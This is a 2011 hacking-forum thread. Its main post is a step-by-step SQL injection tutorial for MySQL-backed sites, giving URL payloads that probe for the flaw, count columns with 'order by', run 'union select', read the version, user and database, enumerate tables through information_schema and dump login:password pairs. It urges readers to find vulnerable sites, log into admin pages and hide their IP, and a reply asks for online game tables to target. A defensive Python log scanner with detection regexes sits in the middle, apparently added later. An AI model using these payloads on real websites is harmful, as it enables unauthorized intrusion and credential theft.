Post: How to sql inject[With Pics]
05-02-2011, 06:26 PM #1
The defacing part will be up tomorrow

1) Find a vulnerable site.
To find a vulnerable site, head over to this thread.

2) Checking it is vulnerable.
To check it is vulnerable you will need to put a
    '
after the website address.
Example
    www.site.com/news_veiw.php?ID=47'

If it's vulnerable you will see something like this:

    MySQL Login Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' AND show_status=1 AND article!=''' at line 1


3) Finding how many columns there are.
To do this you use the syntax
    order by 10--

Example
    www.site.com/news_veiw.php?ID=47 order by 10--

If the website loads normally, keep going up by 5 until you get an error.

When you get the error it should say something like "column 10 does not exist".
This is when you know you have gone too high, so when you get this, keep changing the number by going down. When you get no error, this means it is that amount of columns.

So say I got:

1: no error
2: no error
3: no error
4: Error

This means it has 3 columns.

4) How to find which column is vulnerable
To find the vulnerable column is simple.
The syntax:
    union select 1,2--

You put in how many columns there are, so say you have 10 columns, you have to put
    union select 1,2,3,4,5,6,7,8,9,10--


Example
    www.site.com/news_veiw?ID=-47 union select 1,2--


Note there is a
    -
before the 47 ^.
It will come up with a number. This is the vulnerable column.


5) Now to find the database version

To do this it's a simple syntax
    @@version 


All you have to do is replace the vulnerable column with @@version

Example :
    www.site.com/news_veiw?ID=-47 union select 1,@@version--

So as you can see, the vulnerable column's number was 2.

As you can see in the picture, the database version is 4.

If the database version is 4 then I suggest using Havij.

If the database is version 5 then you can get the tables and columns, whereas if you are trying to hack a version 4 database you have to guess the tables and columns.

6) Getting the current user.

Simply replace the @@version with user().

Example:
    www.site.com/news_view?ID=-47 union select 1,user()--


7) Getting the database
To get the database you just need to change a couple of things

    union select 
-->
    +UNION+SELECT+

    user()
-->
    database()

and you have to take the
    -
off at the end

Example :
    www.site.com/news_view?ID=-47+UNION+SELECT+1,database()

For version 5 only.

8) Getting the tables
Quite a lot gets changed on this syntax

    database()
-->
    group_concat(table_name)

Then add
    from information_schema.tables where table_schema=database()--
at the end

example :

    www.site.com/news_view?ID=-47+UNION+SELECT+1,group_concat(table_name) from information_schema.tables where table_schema=database()--


It will come up with loads of words. There should be something like admin or users.

9) Getting the columns
Syntax:
    group_concat(table_name)
-->
    group_concat(column_name)

    from information_schema.tables where table_schema=database()--
-->
    from information_schema.columns where table_schema=database()--


Example :
    www.site.com/news_view?ID=-47+UNION+SELECT+1,group_concat(column_name) from information_schema.columns where table_schema=database()--


Should display something like password and user name.

10) Dumping users/pass

syntax :
    group_concat(column+name)
-->
    group_concat(login,0x3a,password,0x3a)


Note that the login and password were found in the column; if there was no login and password in the column, this will not work and you will need to change it to the stuff you found.
    from information_schema.columns where table_schema=database()--
-->
    from the bpuser--
Note that it is the table which you found earlier which you put instead of bpusers.

There will be a username, then the : separates the username and pass,
e.g.
say the username was admin and pass is 123, then it will be displayed like this:

admin:123

Once you have done this you will need to find the admin page and log in.

Make sure you hide your IP or they can trace you.


Happy Hacking :pirate:
Please don't leech, took about 30 mins to write out

Some pictures were used from hf

But most were my own

Please note that the video is not mine!

The following 4 users say thank you to ii LeDgEnz x for this useful post:

Darknesse13, Jorgos Nomikos, Mr Hankey, Outlasted Wolf
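
From the defending side, the step sequence in the post above (quote probe, `order by`, `union select`, `@@version`/`user()`/`database()`, `information_schema`) is visible in web server access logs. The following is an added example, not part of the original post: a small log scanner that labels each request by stage and flags clients that walk through several stages. The stage names, paths, IP addresses and log lines are constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# One pattern per step of the walkthrough; the stage names are labels chosen here.
STAGES = {
    "quote_probe": re.compile(r"=[^&]*'"),
    "column_count": re.compile(r"\border\s+by\s+\d+", re.I),
    "union_select": re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I),
    "fingerprint": re.compile(r"@@version|\b(?:user|database)\s*\(\s*\)", re.I),
    "schema_enum": re.compile(r"\binformation_schema\.(?:tables|columns)\b", re.I),
}
# Common/combined access-log prefix: client, timestamp, request line, status.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (\S+) HTTP/[\d.]+" \d{3}')


def classify(url):
    """Return the stages whose pattern appears in the URL-decoded query string."""
    query = unquote_plus(url.partition("?")[2])
    return {name for name, rx in STAGES.items() if rx.search(query)}


def flag_clients(lines, min_stages=2):
    """Map client IP -> sorted stages for clients seen in >= min_stages stages."""
    seen = defaultdict(set)
    for line in lines:
        m = LOG_RE.match(line)
        if m:
            seen[m.group(1)] |= classify(m.group(2))
    return {ip: sorted(s) for ip, s in seen.items() if len(s) >= min_stages}


# Constructed sample log (documentation-range IPs, hypothetical paths).
TS = "[05/Feb/2011:18:26:00 +0000]"
SAMPLE_LOG = [
    f'192.0.2.10 - - {TS} "GET /news_view.php?ID=47 HTTP/1.1" 200 5120',
    f'192.0.2.10 - - {TS} "GET /search.php?q=o%27brien HTTP/1.1" 200 2048',
    f'198.51.100.7 - - {TS} "GET /news_view.php?ID=47%27 HTTP/1.1" 500 310',
    f'198.51.100.7 - - {TS} "GET /news_view.php?ID=47%20order%20by%2010-- HTTP/1.1" 500 310',
    f'198.51.100.7 - - {TS} "GET /news_view.php?ID=-47+UNION+SELECT+1,@@version-- HTTP/1.1" 200 4100',
    f'198.51.100.7 - - {TS} "GET /news_view.php?ID=-47+UNION+SELECT+1,group_concat(table_name)'
    f'%20from%20information_schema.tables HTTP/1.1" 200 4100',
]

if __name__ == "__main__":
    for ip, stages in flag_clients(SAMPLE_LOG).items():
        print(ip, "->", ", ".join(stages))
```

Requiring two or more stages keeps a single apostrophe in a legitimate search term from raising an alert. The scanner only sees what the access log records and decodes the URL once, so it complements parameterized queries and suppressed database error output rather than replacing them.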
05-02-2011, 10:09 PM #2
Jorgos Nomikos
Bounty hunter
WHOW.. Great!!
Really Thanks for this Topic!
Do you know some Tables of Online games like: WoW, Aion?
I only know their Tables of Emulate Java Private Servers :(
